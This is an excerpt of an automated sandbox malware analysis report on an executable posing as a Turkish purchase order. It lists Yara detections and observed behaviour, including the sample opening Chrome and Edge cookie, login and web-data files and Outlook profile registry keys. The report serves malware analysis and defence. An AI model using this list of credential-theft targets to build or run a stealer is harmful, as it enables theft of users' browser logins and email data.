Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs